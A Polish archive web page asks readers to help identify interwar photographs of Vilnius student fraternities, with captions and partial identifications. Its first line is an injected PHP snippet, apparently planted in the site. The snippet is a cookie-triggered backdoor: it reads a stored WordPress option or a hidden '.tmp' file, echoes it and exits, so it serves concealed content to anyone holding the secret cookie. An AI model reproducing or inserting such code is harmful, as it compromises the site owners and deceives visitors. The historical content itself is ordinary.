if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Wilna

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Poczty sztandarowe korporacji akademickich, Dziedziniec Skargi, Wilno.

0.1. Poczty sztandarowe korporacji akademickich, Dziedziniec Skargi, Wilno.

Nieopisana fotografia przedstawiająca poczty sztandarowe korporacji akademickich na Dziedzińcu Skargi Uniwersytetu Stefana Batorego w Wilnie.

Istotne byłoby ustalenie dokładnej daty, okoliczności, jak także tożsamości choćby części widocznych na niej osób.

Poczty sztandarowe korporacji akademickich, Wilno.

0.2. Poczty sztandarowe korporacji akademickich.

Nieopisana fotografia przedstawiająca poczty sztandarowe korporacji akademickich w Wilnie.

Istotne byłoby ustalenie dokładnej daty, okoliczności, jak także tożsamości choćby części widocznych na niej osób.

Członkowie korporacji wileńskich z księdzem-Arkonem (?), Wilno ok. 1930 r. (?).

0.3. Członkowie korporacji wileńskich z księdzem-Arkonem (?), Wilno ok. 1930 r. (?).

Nieopisana fotografia przedstawiająca członków korporacji wileńskich z siedzącym wśród nich księdzem trzymającym dekiel Arkonii.

Istotne byłoby ustalenie dokładnej daty, okoliczności, jak także tożsamości choćby części widocznych na fotografii osób, a w szczególności owego księdza (Zygmunt Lewicki z K! Arkonia?).

Ks. Zygmunt Lewicki z K! Arkonia, potwierdzenie przypuszczenia na podstawie innej fotografii 18 VII 2013 r. dzięki pomocy Krzysztofa Tyszki.

_________________________________________________________________________________________

Konwent Polonia, Dorpat ok. 1915 r.

1.1. Konwent Polonia ok. 1915 r.

Fotografia przedstawia Konwentu Polonia w Dorpacie w początkach I wojny światowej. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, jak także daty wykonania zdjęcia.

Prawd. członek Konwentu Polonia.

1.2. Prawd. członek Konwentu Polonia z Dorpatu.

Fotografia przedstawia prawdopodobnie członka Konwentu Polonia z Dorpatu. Istotne byłoby ustalenie tożsamości osoby oraz daty wykonania zdjęcia.

Coetus Konwentu Polonia w 1929 r.

1.3. Coetus Konwentu Polonia

Fotografia przedstawiająca coetus Konwentu Polonia w siedzibie Korporacji w 1929 r. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu.

Konkurs Bachusa, Wilno 1929 r.

1.4. Biesiada w Konwencie Polonia

Fotografia przedstawiająca biesiadę w siedzibie Konwentu Polonia. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu.

Prawd. członek Konwentu Polonia.

1.5. Prawd. członek Konwentu Polonia z Wilna.

Fotografia przedstawia prawdopodobnie członka Konwentu Polonia z Wilna. Istotne byłoby ustalenie tożsamości osoby oraz daty wykonania zdjęcia.

Dwóch członków Konwentu Polonia, Wilno 1930 r.

1.7. Dwóch członków Konwentu Polonia z Wilna.

Fotografia przedstawia prawdopodobnie dwóch członków Konwentu Polonia z Wilna. Istotne byłoby ustalenie tożsamości osób na fatografii.

_________________________________________________________________________________________

Członek Batorii, 1926/27 r.

2.1a. Zygmunt Przyjałgowski z Konwentu Batoria (?).

Według jednego z opisów fotografia przedstawia Zygmunta Przyjałgowskiego. Istotne byłoby potwierdzenie (określenie) tożsamości osoby na zdjęciu.

Członek Batorii, 1927/28 r.

2.1b. Zygmunt Przyjałgowski z Konwentu Batoria (?).

Według jednego z opisów fotografia przedstawia Zygmunta Przyjałgowskiego. Istotne byłoby potwierdzenie (określenie) tożsamości osoby na zdjęciu.

Członek Batorii, 1926/27 r.

2.2. Członek Batorii.

Fotografia przedstawiająca jednego z członków Konwentu Batoria. Opisana jako “Antoni Ważyński”. Istotne byłoby potwierdzenie (określenie) tożsamości osoby na zdjęciu.

Członek Batorii, 1926/27 r.

2.3. Członek Batorii.

Fotografia przedstawiająca jednego z członków Konwentu Batoria. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Członek Batorii, 1926/27 r.

2.4. Członek Batorii.

Fotografia przedstawiająca jednego z członków Konwentu Batoria. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Członek Batorii, 1926/27 r.

2.5. Członek Batorii.

Fotografia przedstawiająca jednego z członków Konwentu Batoria. Opisana jako “Henryk Kwiatkowski”. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Prawdopodobnie członek Batorii.

2.6. Prawdopodobnie członek Batorii.

Fotografia przedstawiająca prawdopodobnie jednego z członków Konwentu Batoria. Istotne byłoby określenie tożsamości osoby na zdjęciu oraz daty i miejsca wykonania fotografii.

Korporanci z Wilna (?) z Batorii (?), lata 30-te.

2.7. Korporanci z Wilna (?) z Batorii (?).

Fotografia przedstawiająca prawdopodobnie jednego bądź dwóch korporantów z Wilna, prawdopodobnie związanych z Konwentem Batoria. Istotne byłoby określenie tożsamości osób na zdjęciu oraz daty i miejsca wykonania fotografii.

Prezydium Batorii, od lewej: NN, NN, sekretarz (?) Kazimierz Horoszko, Wilno lata 20-te.

2.8. Prezydium Batorii.

Fotografia przedstawia jedno z prezydiów Batorii z lat 20-tych. Istotne byłoby określenie daty wykonania fotografii, a także tożsamości niezidentyfikowanych osób na zdjęciu.

Prezydium Batorii, od lewej: NN, prawd. wiceprezes Kazimierz Horoszko, prezes NN, prawd. sekretarz Tadeusz Bodalski, NN, Wilno prawd. koniec lat 20-tych.

2.9. Prezydium Batorii.

Fotografia przedstawia jedno z prezydiów Batorii w końcu lat 20-tych. Istotne byłoby określenie daty wykonania fotografii, a także tożsamości niezidentyfikowanych osób na zdjęciu.

Prezydium Batorii, Wilno lata 30-te.

2.10. Prezydium Batorii.

Fotografia przedstawia jedno z prezydiów Batorii w latach 30-tych. Istotne byłoby określenie daty wykonania fotografii, a także tożsamości niezidentyfikowanych osób na zdjęciu.

Drugi od prawej Paweł Heinzelman, identyfikacja dnia 26 II 2011 r. dzięki pomocy syna Pawła M. Heinzelmana.

Coetus Batorii, w środku z rapirem olderman Mieczysław Niewiarowski, ok. 1924/25 r.

2.11. Coetus Batorii, ok. 1924/25 r.

Fotografia przedstawia coetus Batorii prawdopodobnie w roku akademickim 1924/25. Istotne byłoby określenie daty i miejsca wykonania fotografii, a także tożsamości niezidentyfikowanych osób na zdjęciu.

Batorusi w aucie, lata 30-te.

2.12. Batorusi w aucie.

Fotografia przedstawiająca najprawdopodobniej korporantów z Batorii. Istotne byłoby określenie tożsamości osób na zdjęciu oraz daty i miejsca wykonania fotografii.

Siedzi na stopniu pierwszy od prawej Paweł Heinzelman, identyfikacja dnia 26 II 2011 r. dzięki pomocy syna Pawła M. Heinzelmana.

Zabawa “Śledzik” Konwentu Batoria.

2.13. Zabawa “Śledzik” Konwentu Batoria.

Fotografia przedstawiająca zabawę organizowaną przez Konwent Batoria tzw. “Śledzik”. Istotne byłoby określenie daty i miejsca wykonania fotografii, a także tożsamości osób na zdjęciu.

Powojenne spotkanie Batorii, lata 50-60-te.

2.14. Powojenne spotkanie Batorii, lata 50-60-te.

Nieopisana fotografia przedstawiająca jedno z powojennych spotkań Konwentu Batoria w Warszawie.

Istotne byłoby ustalenie dokładnej daty, okoliczności, jak także tożsamości choćby części widocznych na zdjęciu osób.

Siedzi trzeci od prawej z siedzących Paweł Heinzelman (w deklu i bandzie), identyfikacja dnia 26 II 2011 r. dzięki pomocy syna Pawła M. Heinzelmana.

_________________________________________________________________________________________

Marek Litwiński, ok. 1930 r.

3.1. Fotografia członków Polesii.

Fotografia przedstawiająca grupę członków Polesii ok. 1930 r. Istotne byłoby zwryfikowanie i uzupełnienie opisu fotografii: “‘Korporacja Polesia, od lewej w pierwszym rzędzie: NN, NN Zdzisław Pankla, w drugim rzędzie od lewej: NN (czytający gazetę), Marek Litwiński, NN, Kazimierz Sowiński, Wilno ok. 1930 r.”

Dwóch członków Polesii, Wilno prawd. koniec lat 20-tych.

3.2. Dwóch Polesiuszy.

Fotografia przedstawiająca dwóch członków Polesii prawdopodobnie w końcu lat 20-tych. Istotne byłoby tożsamości widocznych na zdjęciu osób oraz daty wykonania fotografii.

Karykatura jednego z członków Polesii, prawd. ok. 1930 r.

3.3. Karykatura jednego z członków Polesii.

Fotografia przedstawiająca karykaturę jednego z członków Polesii, prawdopodobnie ok. 1930 r. Istotne byłoby tożsamości widocznej na obrazku osoby.

Karykatura jednego z członków Polesii II, prawd. ok. 1930 r.

3.4. Karykatura jednego z członków Polesii II.

Fotografia przedstawiająca karykaturę jednego z członków Polesii, prawdopodobnie ok. 1930 r. Istotne byłoby tożsamości widocznej na obrazku osoby.

Karykatura dwóch członków Polesii, prawd. ok. 1930 r.

3.5. Karykatura dwóch członków Polesii.

Fotografia przedstawiająca karykaturę dwóch członków Polesii, prawdopodobnie ok. 1930 r. Istotne byłoby tożsamości widocznych na obrazku osób.

Coetus Polesii, w górnym rzędzie od lewej NN, NN, Józef Musiatowicz, Wacław Olszewski, NN, NN, NN, siedzą od lewej NN, Kazimierz Giecewicz (?), olderman NN, NN, NN, Wilno prawd. ok. 1934 r.

3.6. Coetus Polesii ok. 1934 r.

Fotografia przedstawiająca grupę członków Polesii ok. 1934 r. Istotne byłoby ustalenie daty wykonania fotografii oraz tożsamości widocznych na obrazku osób.

_________________________________________________________________________________________

Vilnensia z członkami honorowymi, Wilno ok. 1930 r.

4.1. Vilnensia z członkami honorowymi na kwaterze.

Fotografia przedstawia grupę kilkunastu członków Vilnensii wraz z członkami honorowymi. Zdjęcie zostało zrobione najprawdopodobniej w siedzibie Korporacji. Istotne byłoby ustalenie tożsamości osób na zdjęciu, w szczególności członków honorowych, a także daty i miejsca wykonania fotografii.

Filistrzy honorowi i goście na komersie Vilnensii, Wilno ok. 1930 r. (?).

4.2. Filistrzy honorowi i goście na komersie Vilnensii.

Fotografia przedstawia grupę członków honorowych Vilnensii oraz gości w czasie komersu Vilnensii. Istotne byłoby ustalenie tożsamości osób na zdjęciu, a także daty i miejsca wykonania fotografii.

Poczty korporacji wileńskich, na pierwszym planie Vilnensia, Wilno ok. 1930 r.

4.3. Poczet sztandarowy Vilnensii.

Fotografia przedstawiająca poczty korporacji wileńskich. Na pierwszym planie członkowie Vilnensii ze sztandarem, w tym pierwszy z lewej od sztandaru Edmund Krupieńczyk. Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, a także daty oraz okoliczności wykonania fotografii.

Grupa członków Vilnensii na ulicy, Wilno ok. 1930 r.

4.4. Grupa członków Vilnensii na ulicy.

Fotografia przedstawia czterech członków Vilnensii (trzeci od lewej Edmund Krupieńczyk). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, a także daty wykonania fotografii.

Grupa członków Vilnensii, Wilno ok. 1930 r.

4.5. Grupa członków Vilnensii.

Fotografia przedstawia grupę członków Vilnensii. Istotne byłoby ustalenie tożsamości osób na zdjęciu, a także daty wykonania fotografii.

Marek Litwiński, ok. 1928 r. (?).

4.6. Marek Litwiński (?).

Zgodnie z opisem na odwrocie fotografii, na zdjęciu widoczny jest Marek Litwiński. Istotne byłoby zweryfikowanie tej informacji, jak także danych dotyczących innych osób na fotografii.

Członek Vilnensii (?), Wilno ok. 1930 r.

4.7. Członek Vilnensii (?).

Nieopisana na odwrocie fotografia przedstawiająca korporanta, prawdopodobnie członka Korporacji Vilnensia. Istotne byłoby ustalenie tożsamości osoby na zdjęciu.

_________________________________________________________________________________________

Zbiorowa fotografia Śniadecji, Wilno.

5.1. Zbiorowa fotografia Śniadecji.

Fotografia przedstawia grupę członków Śniadecji. Istotne byłoby ustalenie tożsamości osób na fotografii, a także daty i okoliczności wykonania zdjęcia.

Poczet sztandarowy Śniadecii, Wilno.

5.2. Poczet sztandarowy Śniadecji.

Fotografia przedstawia poczet sztandarowy Śniadecji. Istotne byłoby ustalenie tożsamości osób na fotografii, a także daty i okoliczności wykonania zdjęcia.

Członek Korporacja Śniadecia, Wilno 8 I 1928 r.

5.3. Fotografia członka Korporacji Śniadecia

Fotografia z dedykacją “Kochanemu koledze Jurkowi w dowód szczerej przyjaźni ofiarowuję swą podobiznę Wacek, Wilno 8 I 1928 r.” Istotne byłoby ustalenie tożsamości osoby na fotografii.

_________________________________________________________________________________________

Korporacja Conradia.

6.1. Korporacja Conradia.

Nieopisana fotografia przedstawiająca prawdopodobnie komers Korporacji Conradia w Wilnie. Na ścianie widoczne herby K! Conradiia i K! Laudania z Warszawy.

Istotne byłoby ustalenie dokładnej daty, okoliczności, jak także tożsamości choćby części widocznych na niej osób.

W drugim rzędzie drugi od prawej (bez czapki z kieliszkiem w ręku) Franciszek Świderski. Identyfikacja 11 I 2015 r. dzięki pomocy Zdzisława Świderskiego.

Prezydium Conradii, pierwszy z lewej Kazimierz Ellert, Wilno prawd. koniec lat 20-tych.

6.2. Prezydium Korporacji Conradia.

Nieopisana fotografia przedstawiająca Prezydium Korporacji Conradia.

Istotne byłoby ustalenie dokładnej daty, jak także tożsamości widocznych na niej osób.

_________________________________________________________________________________________

Korporacja Leonidania, Wilno 1928 r.

8.1. Leonidania.

Fotografia z 1928 r. przedstawiająca dużą grupę członków Korporacji Leonidania. Istotne byłoby ustalenie tożsamości widocznych na zdjęciu osób, a także dokładnej daty i miejsca wykonania fotografii.

Prezydium Leonidanii, Wilno lata 30-te.

8.2. Prezydium Leonidanii.

Fotografia przedstawiająca Prezydium Leonidanii, pierwszy od lewej Czesław Płatakis. Istotne byłoby ustalenie tożsamości pozostałych widocznych na zdjęciu osób, a także daty i okoliczności wykonania fotografii.

Prezydium Leonidanii, drugi od lewej Jan Szubzda, Wilno pierwsza połowa lat 30-tych.

8.3. Prezydium Leonidanii II.

Fotografia przedstawiająca Prezydium Leonidanii, drugi od lewej Jan Szubzda. Istotne byłoby ustalenie tożsamości pozostałych widocznych na zdjęciu osób, a także daty i okoliczności wykonania fotografii.

Trzeci od lewej Władysław Giedrojć-Juraha, identyfikacja dnia 15 II 2012 r. dzięki pomocy syna Wojciecha Gierdrojć-Jurahy.

Prezydium Leonidanii, Wilno pierwsza połowa lat 30-tych.

8.4. Prezydium Leonidanii III.

Fotografia przedstawiająca Prezydium Leonidanii, pierwszy od prawej Jan Szubzda. Istotne byłoby ustalenie tożsamości pozostałych widocznych na zdjęciu osób, a także daty i okoliczności wykonania fotografii.

Członkowie Leonidanii na moście.

8.5. Członkowie Leonidanii na moście.

Fotografia przedstawiająca grupę członków Korporacji Leonidania. Istotne byłoby ustalenie tożsamości widocznych na niej osób, a także daty i miejsca wykonania fotografii.

_________________________________________________________________________________________

Coetus Filomatii Vilnensis, Wilno 1933 r. (?)

10.1. Coetus Filomatii Vilnensis

Fotografia przedstawia coetus Filomatii. Istotne byłoby ustalenie tożsamości osób na fotografii, jak także daty i miejsca wykonania zdjęcia.

Filomatia Vilnensis, Wilno 1930 r.

10.2. Coetus Filomatii Vilnensis

Fotografia przedstawia coetus Filomatii. Istotne byłoby ustalenie tożsamości osób na fotografii, jak także daty i miejsca wykonania zdjęcia.

_________________________________________________________________________________________

Komers (?) Orientii, Wilno ok. 1937 r.

12.1. Komers (?) Orientii

Fotografia przedstawia osoby siedzące przy stole prezydialnym na komersie (?) Korporacji Orientia ok. 1937 r. Istotne byłoby ustalenie tożsamości osób na fotografii, jak także daty i miejsca uroczystości.

Komers (?) Orientii, Wilno ok. 1937 r.

12.2. Komers (?) Orientii II

Fotografia przedstawia osoby siedzące przy stole prezydialnym na komersie (?) Korporacji Orientia ok. 1937 r. Istotne byłoby ustalenie tożsamości osób na fotografii, jak także daty i miejsca uroczystości.

Grupa członków Orientii, Wilno ok. 1937 r.

12.3. Grupa członków Orientii.

Fotografia przedstawia grupę członków Orientii ok. 1937 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także daty i miejsca wykoniania fotografii.

Grupa członków Orientii w dniu obchodów X-lecia Korporacji Leonidania, Wilno 1937 r.

12.4. Grupa członków Orientii.

Fotografia przedstawia grupę członków Orientii w 1937 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także dokładnej daty i miejsca wykoniania fotografii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 17 VII 2010 r.
Ostania zmiana: 11 I 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Wilna, (na:) www.archiwumkorporacyjne.pl, stan 11 I 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }